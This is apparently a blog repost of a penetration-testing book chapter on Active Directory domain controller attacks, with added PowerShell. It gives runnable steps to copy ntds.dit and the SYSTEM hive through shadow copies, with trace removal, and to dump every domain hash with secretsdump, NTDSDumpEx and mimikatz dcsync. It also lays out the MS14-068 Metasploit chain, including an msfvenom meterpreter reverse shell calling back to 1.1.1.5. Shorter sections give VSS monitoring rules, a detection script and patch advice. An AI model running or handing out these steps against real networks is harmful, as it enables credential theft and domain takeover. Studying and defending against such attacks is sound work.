Chapter 6 domain controller security
2022-06-10 00:52:00 【nigo134】
1. Using the Volume Shadow Copy Service to extract ntds.dit
Methods:
- extract ntds.dit with ntdsutil.exe
- extract ntds.dit with vssadmin
- extract ntds.dit with the vssown.vbs script
- create a shadow copy with ntdsutil's IFM (Install From Media) mode
- export ntds.dit with diskshadow
Extracting ntds.dit with ntdsutil.exe
Normally, even with administrator rights, you cannot read the ntds.dit file from a domain controller: like the SAM file, it is held open and locked by the Windows system. To get at its contents you use the Windows Volume Shadow Copy Service (VSS). In Active Directory all directory data is stored in ntds.dit, a binary database containing user names, password hashes, groups, GPP, OUs and other directory information. VSS is essentially a snapshot technology intended for backup and recovery: a snapshot is a consistent, readable copy of the volume, so a file can be copied out of it even while the live copy is locked.

ntdsutil.exe is the command-line tool that provides a management interface for Active Directory. With it you can maintain and manage the AD database, control operations on a single host, create application directory partitions and so on. It is installed on domain controllers by default, so it can be run directly on the DC. ntdsutil itself ships with Windows Server 2003, 2008 and 2012, but the snapshot subcommand used below requires Windows Server 2008 or later. Extraction takes three steps: create a snapshot, mount it, and copy ntds.dit out of the mounted snapshot.
Step 1: create a snapshot
ntdsutil.exe snapshot "activate instance ntds" create q q
ntdsutil prints the GUID of the new snapshot, for example:
{850bc5ab-7620-48fa-bd1f-c23c8150a3f0}
Step 2: mount the snapshot
ntdsutil.exe snapshot "mount {850bc5ab-7620-48fa-bd1f-c23c8150a3f0}" q q
The snapshot is mounted at a path such as C:\$SNAP_202009222211_VOLUMEC$\ ; the database can then be copied from the Windows\NTDS directory under that path with an ordinary copy command.
To remove traces, delete the snapshot when you are done. This also takes three steps:
Step 1: list the snapshots
ntdsutil.exe snapshot "List All" q q
Step 2: unmount and delete
ntdsutil.exe snapshot "unmount {850bc5ab-7620-48fa-bd1f-c23c8150a3f0}" "delete {850bc5ab-7620-48fa-bd1f-c23c8150a3f0}" q q
Step 3: list the snapshots again and confirm that the snapshot is gone
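The steps above as one script, added here as an example for this page (it is not code from the book or from Microsoft). It runs the create, mount, copy and unmount/delete sequence from an elevated PowerShell prompt on the domain controller, and additionally saves the SYSTEM registry hive with reg.exe, which is the system.save file the next section needs. Assumptions not stated on the page: ntdsutil reports the new snapshot as "Snapshot set {GUID} generated successfully." and the mount as "Snapshot {GUID} mounted as <path>", the database sits at <path>\Windows\NTDS\ntds.dit, and C:\Windows\Temp\ntds_export is just a chosen destination directory.

```powershell
# Added example: full ntdsutil snapshot workflow (create -> mount -> copy -> unmount/delete)
# plus a SYSTEM hive export. Run from an elevated PowerShell prompt on a domain controller.
# Assumed (not from the page): ntdsutil output formats, the ntds.dit path inside the snapshot,
# and the destination directory below.

$outDir = 'C:\Windows\Temp\ntds_export'      # assumed destination, change as needed
New-Item -ItemType Directory -Path $outDir -Force | Out-Null

# Step 1: create the snapshot and pick the GUID out of ntdsutil's output.
$createOut = (& ntdsutil.exe snapshot "activate instance ntds" create quit quit) -join "`n"
if ($createOut -match '\{[0-9a-fA-F-]{36}\}') { $guid = $Matches[0] }
else { throw "No snapshot GUID in ntdsutil output:`n$createOut" }

# Step 2: mount it; the mount point looks like C:\$SNAP_<yyyyMMddHHmm>_VOLUMEC$\.
$mountOut = (& ntdsutil.exe snapshot "mount $guid" quit quit) -join "`n"
if ($mountOut -match 'mounted as (?<path>\S+)') { $mountPath = $Matches['path'].TrimEnd('\') }
else { throw "Mount failed:`n$mountOut" }

try {
    # Step 3: copy the (normally locked) database out of the read-only snapshot.
    $src = Join-Path $mountPath 'Windows\NTDS\ntds.dit'
    Copy-Item -LiteralPath $src -Destination (Join-Path $outDir 'ntds.dit') -ErrorAction Stop

    # The SYSTEM hive carries the boot key needed to decrypt the hashes; reg.exe writes it
    # without any third-party tool (this is the system.save file used in section 2).
    & reg.exe save HKLM\SYSTEM (Join-Path $outDir 'system.save') /y | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "reg save failed with exit code $LASTEXITCODE" }
}
finally {
    # Cleanup: unmount and delete the snapshot, then list again to confirm nothing is left.
    & ntdsutil.exe snapshot "unmount $guid" "delete $guid" quit quit | Out-Null
    & ntdsutil.exe snapshot "list all" quit quit
}

Get-ChildItem -LiteralPath $outDir   # ntds.dit and system.save should be listed
```

The cleanup is in a finally block on purpose: if the copy fails, the snapshot is still unmounted and deleted, so a mounted snapshot is never left behind on the DC. Everything written under $outDir should itself be removed once the files have been moved off the host.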

2. Exporting the hashes from ntds.dit
- with the impacket toolkit (Linux)
- with NTDSDumpEx (Windows)
Before starting you need two files: the ntds.dit Active Directory database and the SYSTEM registry hive (system.save), which holds the boot key used to decrypt the hashes. The hive can be obtained easily with the small HiveJack tool, which can be downloaded from GitHub (reg save HKLM\SYSTEM <file>, a built-in Windows command, produces the same hive).
With system.save and ntds.dit in hand, impacket's secretsdump extracts every hash stored in the ntds.dit file:
impacket-secretsdump -system system.save -ntds ntds.dit LOCAL
On Windows, NTDSDumpEx does the same job and needs the same two files, system.save and ntds.dit:
.\NTDSDumpEx.exe -d .\ntds.dit -s .\system.save
Installing impacket:
On Windows, change into the unpacked source directory and run
python3 -m pip install .
python3 setup.py install
On Kali:
git clone https://github.com/CoreSecurity/impacket.git
cd impacket/
python3 -m pip install .
python3 setup.py install
(Either pip install . or setup.py install is sufficient on its own. The repository has since moved to the fortra organisation on GitHub; the old URL redirects there.)
3. Monitoring use of the Volume Shadow Copy Service
- Monitoring use of the Volume Shadow Copy Service lets you spot an attacker's malicious operations on the system in time.
- Monitor suspicious operations on the Volume Shadow Copy Service and on any Active Directory database file (ntds.dit) it touches.
- Monitor suspicious instances of System Event ID 7036 (the event that marks the Volume Shadow Copy service entering the running state) and events that create the vssvc.exe process.
- Monitor events that create diskshadow.exe and its child processes.
- Monitor diskshadow.exe instance-creation events on client devices. Unless the business requires it, diskshadow.exe should not appear on a Windows client; if it is found it should be removed immediately.
- Monitor newly appearing logical drive mapping events in the logs.
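The rules above turned into a small triage function, added as an example for this page (not code from the book). It takes event records shaped like Sysmon process-creation events (Id 1, with ProcessName, CommandLine and ParentProcessName) and System service events (Id 7036 with Message) and returns a finding for each rule hit. The field names on the records are my choice for this example, not a Windows schema; a constructed sample is embedded so the block runs offline, and the commented lines at the end show how real Sysmon and System events are mapped into the same shape.

```powershell
# Added example: apply the VSS/diskshadow monitoring rules to process-creation and
# service-state events. Record field names (Id, ProcessName, CommandLine,
# ParentProcessName, Message) are assumptions of this example.

function Find-ShadowCopyAbuse {
    param([Parameter(Mandatory)][object[]]$Events)

    # Tools that drive VSS or read ntds.dit. ntdsutil/vssadmin/wbadmin have legitimate uses on a
    # DC during maintenance, so the command line decides their severity; diskshadow is always high.
    $watched = @('diskshadow.exe', 'vssadmin.exe', 'ntdsutil.exe', 'wbadmin.exe')

    foreach ($e in $Events) {
        # Rule: Event ID 7036 reporting the Volume Shadow Copy service entering the running state.
        if ($e.Id -eq 7036) {
            if ([string]$e.Message -match 'Volume Shadow Copy.*running') {
                [pscustomobject]@{ Severity = 'info'; Reason = 'VSS service entered running state'; Event = $e }
            }
            continue
        }
        if ($e.Id -notin @(1, 4688)) { continue }   # Sysmon 1 or Security 4688 process creation

        $name   = [IO.Path]::GetFileName([string]$e.ProcessName).ToLower()
        $parent = [IO.Path]::GetFileName([string]$e.ParentProcessName).ToLower()
        $cmd    = [string]$e.CommandLine

        # Rule: vssvc.exe started (the service process behind VSS).
        if ($name -eq 'vssvc.exe') {
            [pscustomobject]@{ Severity = 'info'; Reason = 'vssvc.exe process created'; Event = $e }
        }
        # Rule: diskshadow.exe anywhere, or a watched tool whose command line names snapshots or ntds.dit.
        elseif ($name -in $watched) {
            $sev = if ($name -eq 'diskshadow.exe' -or $cmd -match 'ntds\.dit|snapshot|shadow') { 'high' } else { 'medium' }
            [pscustomobject]@{ Severity = $sev; Reason = "$name launched: $cmd"; Event = $e }
        }
        # Rule: child processes spawned by a watched tool (e.g. diskshadow executing a script).
        elseif ($parent -in $watched) {
            [pscustomobject]@{ Severity = 'high'; Reason = "$name spawned by $parent"; Event = $e }
        }
    }
}

# Constructed sample events, not real log data.
$sample = @(
    [pscustomobject]@{ Id = 7036; Message = 'The Volume Shadow Copy service entered the running state.' }
    [pscustomobject]@{ Id = 1; ProcessName = 'C:\Windows\System32\VSSVC.exe'; CommandLine = 'C:\Windows\system32\vssvc.exe'; ParentProcessName = 'C:\Windows\System32\services.exe' }
    [pscustomobject]@{ Id = 1; ProcessName = 'C:\Windows\System32\ntdsutil.exe'; CommandLine = 'ntdsutil.exe snapshot "activate instance ntds" create q q'; ParentProcessName = 'C:\Windows\System32\cmd.exe' }
    [pscustomobject]@{ Id = 1; ProcessName = 'C:\Windows\System32\diskshadow.exe'; CommandLine = 'diskshadow.exe /s C:\Users\Public\ds.txt'; ParentProcessName = 'C:\Windows\System32\cmd.exe' }
    [pscustomobject]@{ Id = 1; ProcessName = 'C:\Windows\System32\cmd.exe'; CommandLine = 'cmd.exe /c copy z:\Windows\NTDS\ntds.dit C:\Users\Public\'; ParentProcessName = 'C:\Windows\System32\diskshadow.exe' }
    [pscustomobject]@{ Id = 1; ProcessName = 'C:\Windows\System32\notepad.exe'; CommandLine = 'notepad.exe'; ParentProcessName = 'C:\Windows\explorer.exe' }
)
Find-ShadowCopyAbuse -Events $sample | Format-Table Severity, Reason -AutoSize

# Real data: System log 7036 events can be passed in as-is (they expose Id and Message);
# Sysmon process-creation events need their EventData fields mapped into the same shape.
# $svc  = Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7036; StartTime = (Get-Date).AddDays(-1) }
# $proc = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1; StartTime = (Get-Date).AddDays(-1) } |
#   ForEach-Object {
#       $d = @{}; ([xml]$_.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
#       [pscustomobject]@{ Id = $_.Id; ProcessName = $d.Image; CommandLine = $d.CommandLine; ParentProcessName = $d.ParentImage }
#   }
# Find-ShadowCopyAbuse -Events ($svc + $proc)
```

In the sample, notepad.exe produces no finding, the 7036 and vssvc.exe records are reported as informational context, and the ntdsutil snapshot, the diskshadow launch and the cmd.exe child of diskshadow are reported as high. On a client, every diskshadow.exe hit is actionable by itself; on a DC, correlate the ntdsutil and vssvc.exe findings with change windows before treating them as incidents.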
4. Obtaining domain hashes with DCSync
Dumping domain hashes with mimikatz
mimikatz has a dcsync function. It does not read ntds.dit through the Volume Shadow Copy Service: it impersonates a domain controller and asks a real DC to replicate the account secrets over the directory replication service (DRS) protocol, so the database file is never touched and nothing is written to disk on the DC. This requires directory replication rights, which domain administrators hold by default, so mimikatz must be run with domain administrator privileges to retrieve the hashes.
On any computer in the domain, open a command prompt with domain administrator privileges and run mimikatz. The following command exports the user names and hashes of all accounts in the domain, as shown in Figure 6-34:
lsadump::dcsync /domain:pentest.com /all /csv
Alternatively, run mimikatz directly on the domain controller and read the hashes from the LSA by injecting into the lsass.exe process:
privilege::debug
lsadump::lsa /inject
5. Analysis and prevention of the Kerberos domain user privilege escalation vulnerability
On 18 November 2014 Microsoft released an out-of-band patch for a Kerberos domain user privilege escalation vulnerability (MS14-068, CVE-2014-6324). All Windows server operating systems are affected, including Windows Server 2003, Windows Server 2008, Windows Server 2008 R2, Windows Server 2012 and Windows Server 2012 R2. The vulnerability undermines the overall privilege control of Active Directory and allows an attacker to elevate any domain user to domain administrator level. Put simply, an attacker who has a shell on any computer in the domain and knows the user name, SID and password of any domain user can obtain domain administrator rights, take control of the domain controller and finally own the domain.
The root cause: when a user requests a TGT (ticket-granting ticket) from the Kerberos Key Distribution Center (KDC), the user can forge the privilege data (the PAC) in the ticket. The KDC accepted PAC signatures made with an unkeyed checksum, so a PAC claiming domain administrator group membership passed validation and the KDC returned a TGT that gave an ordinary domain user domain administrator privileges. The user then presents that TGT to the KDC; once the TGS (ticket-granting service) has validated the TGT it issues service tickets, and the user can access any service, giving the attacker access to resources throughout the domain.
msf attack process
1. Test with Metasploit
use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
Set the parameters:
DOMAIN: the domain name.
PASSWORD: the password of the domain user you control.
USER: the name of that user.
USER_SID: the SID of that user.
exploit
After filling in all the information and entering "exploit", a file such as 20180715230259_default_172.16.86.130_windows.kerberos_839172.bin is written to the /root/.msf4/loot directory, as shown in Figure 6-59.
2. Format conversion
msf cannot import the .bin (ccache) file directly, so convert it to kirbi format with mimikatz:
kerberos::clist ".......bin" /export
3. Generate a reverse shell with msfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.5 LPORT=7777 -f exe > shell.exe
4. Set up the listener in msf (the generic handler, with the same payload, LHOST and LPORT as the executable)
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 1.1.1.5
set LPORT 7777
exploit
5. Import the ticket into the session
getuid                               # check the current privileges
load kiwi
kerberos_ticket_use /tmp/...kirbi    # import the ticket
background
6. Test with the high-privilege ticket
use exploit/windows/local/current_user_psexec
set payload windows/meterpreter/reverse_tcp
set TECHNIQUE PSH
set RHOSTS win2008.hello.com
set lhost 1.1.1.5
set session 1
exploit
Precautions
- Turn on Windows Update and keep automatic updates enabled.
- Or download the patch package and install it manually; Microsoft has released a patch for this vulnerability.
- Control the accounts in the domain: forbid weak passwords and change passwords promptly and regularly.
- Install anti-virus software on servers and keep the signature database up to date.